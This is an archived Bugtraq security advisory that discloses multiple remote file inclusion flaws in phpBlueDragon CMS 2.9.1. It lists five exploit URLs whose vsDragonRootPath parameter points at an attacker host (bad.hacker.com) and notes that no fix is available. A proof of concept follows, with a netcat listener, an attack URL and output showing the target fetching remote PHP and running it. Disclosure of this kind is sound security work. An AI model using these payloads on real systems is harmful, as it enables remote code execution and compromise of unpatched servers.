phpBlueDragon CMS 2.9.1 multiple remote file inclusion vuln

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpBlueDragon CMS 2.9.1 multiple remote file inclusion vuln
From: rozowa.landrynka@xxxxxxxxxxxxxx
Date: 22 Jun 2006 07:35:09 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

PHPBlueDragon CMS <= 2.9.1 http://phpbluedragon.net/

Affected files:
    
root_includes/root_modules/team_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
  
root_includes/root_modules//rss_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
       
root_includes/root_modules/manual_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
    
root_includes/root_modules/forum_admin.php?action=group_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
    
root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/

Solution:

None

Simple PoC:

nc -l -p 9999
...
http://some.site/root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://192.168.0.xx:9999/
...
$ nc -l -p 9999
GET /public_includes/pub_kernel/pbd_move. HTTP/1.0
Host: 192.168.0.xx:9999

HTTP/0.9 200 OK

<?php phpinfo(); ?>
...
System  OpenBSD xxx 3.9 xxx i386
... 

Credits:
shm

Prev by Date: SYMSA-2006-005
Next by Date: Re: Bypassing of web filters by using ASCII
Previous by thread: SYMSA-2006-005
Next by thread: [Kil13r-SA-20060622-2] Namo DeepSearch 4.5 Cross-Site Scripting Vulnerability
Index(es):
- Date
- Thread